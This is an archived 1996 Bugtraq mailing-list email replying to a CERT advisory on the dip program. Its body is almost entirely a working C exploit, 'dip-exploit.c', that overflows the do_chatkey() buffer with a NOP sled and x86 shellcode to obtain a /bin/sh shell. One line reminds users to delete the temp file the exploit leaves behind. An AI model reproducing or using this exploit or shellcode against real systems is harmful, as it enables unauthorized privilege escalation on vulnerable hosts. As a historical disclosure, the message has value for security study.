From Helmut.Springer@RUS.Uni-Stuttgart.DE  Wed Jul 10 09:23:54 1996
Received: from artemis.rus.uni-stuttgart.de (artemis.rus.uni-stuttgart.de [129.69.18.28]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id JAA09688 for <best-of-security@suburbia.net>; Wed, 10 Jul 1996 09:22:45 +1000
Received: from info2.rus.uni-stuttgart.de (info2.rus.uni-stuttgart.de [129.69.18.15]) by artemis.rus.uni-stuttgart.de with SMTP id BAA10947
  (8.6.13/IDA-1.6 for <best-of-security@suburbia.net>); Wed, 10 Jul 1996 01:22:40 +0200
Received: by info2.rus.uni-stuttgart.de (AIX 3.2/UCB 5.64/4.03)
          id AA28647; Wed, 10 Jul 1996 01:22:28 +0200
Received: from artemis.rus.uni-stuttgart.de by info2.rus.uni-stuttgart.de (AIX 3.2/UCB 5.64/4.03)
          id AA64141; Wed, 10 Jul 1996 00:58:14 +0200
Received: from listserv.gmd.de (listserv.gmd.de [192.88.97.1]) by artemis.rus.uni-stuttgart.de with ESMTP id AAA10594
  (8.6.13/IDA-1.6); Wed, 10 Jul 1996 00:58:09 +0200
Received: from listserv.gmd.de by listserv.gmd.de (LSMTP for OpenVMS v1.1a) with SMTP id <9.52997349@listserv.gmd.de>; Wed, 10 Jul 1996 0:58:08 +0200
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with
          spool id 146889 for BUGTRAQ@NETSPACE.ORG; Tue, 9 Jul 1996 18:56:09
          -0400
Received: from netspace.org (netspace [128.148.157.6]) by netspace.org
          (8.7/8.6.12) with SMTP id SAA26503 for <BUGTRAQ@NETSPACE.ORG>; Tue, 9
          Jul 1996 18:55:40 -0400
Approved-By: ALEPH1@UNDERGROUND.ORG
Received: from argos.uniandes.edu.co (argos.uniandes.edu.co [157.253.1.15]) by
          netspace.org (8.7/8.6.12) with SMTP id RAA19031 for
          <BUGTRAQ@NETSPACE.ORG>; Tue, 9 Jul 1996 17:36:45 -0400
Received: by argos.uniandes.edu.co; id AA06266; Tue, 9 Jul 1996 16:31:33 -0400
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Approved-By:  Efrain Torres <e-torres@UNIANDES.EDU.CO>
Message-Id:  <Pine.3.89.9607091629.A4789-0100000@argos.uniandes.edu.co>
Date:         Tue, 9 Jul 1996 16:31:32 -0400
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
Sender: Helmut.Springer@RUS.Uni-Stuttgart.DE
From: Efrain Torres <e-torres@uniandes.edu.co>
Subject:      Re: CERT Advisory CA-96.13 - Vulnerability in the dip program
X-To:         CERT Advisory <cert-advisory@cert.org>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To:  <199607091728.NAA06519@why.cert.org>

justa note.. dont forget to erase the temp.dip file when you run this
exploit.


/* dip-exploit.c - overruns the buffer in do_chatkey() to give a shell */

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define PATH_DIP "/usr/sbin/dip"

u_char shell[] = /* courtesy of avalon  ;) */
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

u_long esp() { __asm__("movl %esp, %eax"); }

main()
{
  u_char buf[1024];
  u_long addr;
  int i, f;

  strcpy(buf, "chatkey ");
  addr = esp() - 192;
  for (i=8; i<128+16; i+=4)
    *((u_long *) (buf+i)) = addr;
  for (i=128+16; i<512; i++)
    buf[i] = 0x90;
  for (i=0; i<strlen(shell); i++)
    buf[512+i] = shell[i];
  buf[512+i] = '\n';

  if ((f = open("temp.dip", O_WRONLY|O_TRUNC|O_CREAT, 0600)) < 0) {
    perror("temp.dip");
    exit(0);
  }
  write(f, buf, 512+i);
  close(f);

  execl(PATH_DIP, "dip", "temp.dip", (char *)0);
}